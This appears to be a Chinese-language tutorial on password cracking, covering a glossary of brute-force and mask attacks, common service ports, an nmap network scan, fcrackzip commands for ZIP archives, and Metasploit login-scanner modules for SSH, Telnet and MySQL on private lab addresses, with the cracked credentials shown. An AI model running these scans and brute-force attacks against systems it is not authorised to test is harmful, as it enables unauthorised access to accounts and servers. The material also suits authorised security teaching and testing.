密码破解前期的准备

常见名词解释

| 名词 | 释意 |
| - - -| - - - |
| 字典 | 即一些密码的集合，格式一般为 txt |
| 暴力破解 | 一种破解方式，通过已知密码字典分别进行尝试，成功率和字典有关。 |
| 掩码破解 | 由于受到字典的限制无法破解成功，可用 猜测的方式破解。如 ?a?a?a?a 代表 4位 0~9的密码（不同程序，表示方法可能不同。）但是对计算机的要求比较高 |

常见端口信息收集

| 端口 | 程序 |
|- - - |- - - |
| 21 | FTP端口 用于上传文件到服务器 |
| 22 | SSH SFTP端口，用于登录服务器执行命令 |
| 3306 | mysql端口 （远程服务器需要账号授权） |
| 3389 | Windwos远程登录端口 |
| 5800 | VNC端口相当于Windows的远程登录 |

判断端口是否开启

利用 nmap即可查看目标端口是否开启

nmap -T4 -A 192.168.1.1/24

扫描局域网内所有设备开启的相关端口，当然我们也可以中 msfconsole nessus等相关神器进行信息收集，但这里不再详讲！
如下图 这台 ASUS RT-N56U 设备开启了 22 80等端口。

常见的破解方式

01压缩文件的暴力破解(zip rar )

使用fcrackzip破解zip压缩包

这是一款kali下字段的破解zip压缩包的工具。
使用如下：
破解ZIP加密文件

fcrackzip -b -l 6-6 -c 1 -p 000000 passwd.zip

• -b 暴力破解
• -c 1 限制密码是数字
• -l 6-6 限制密码长度为6
• -p 000000 初始化破解起点

如何使用字典破解呢

fcrackzip -D -p passwd passwd.zip

• -D -p passwd 密码本passwd文件

当然，也可以参考我前面写过的一篇文章
《利用python破解zip密码》

02破解ssh

我们可以利用 nmap msfconsole 等工具里面字典的模块进行破解。这里 以 msfconsole为例：

use auxiliary/scanner/ssh/ssh_login
set PASS_FILE /root/zi.txt
set RHOSTS 192.168.123.1
set USERNAME admin
run

如下：密码和账号破解为 admin admin

03telnet破解

Telnet协议是TCP/IP协议族中的一员，是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序，用它连接到服务器。
扫描目标是否开启相应端口

nmap -T4 -A 192.168.123.1 -p 23

结果如下：

利用msfconsole中的相应模块进行破解

use auxiliary/scanner/telnet/telnet_login

破解效果如下：

04 mysql破解

MySQL是一个关系型数据库管理系统，MySQL 是最流行的关系型数据库管理系统之一，在 WEB 应用方面，MySQL是最好的 RDBMS 应用软件之一。

使用模块

use auxiliary/scanner/mysql/mysql_login

效果如下

数据库 dede 的密码为 123456

远程登录测试

当然，我们利用其他的密码破解工具也是可以的，如hashcat john medusa这些神器都可以完成密码的破解，每个工具都有各自的优势和缺点，这里我也不详细说明了。有兴趣的可以去论坛查找相关的帖子学习哦！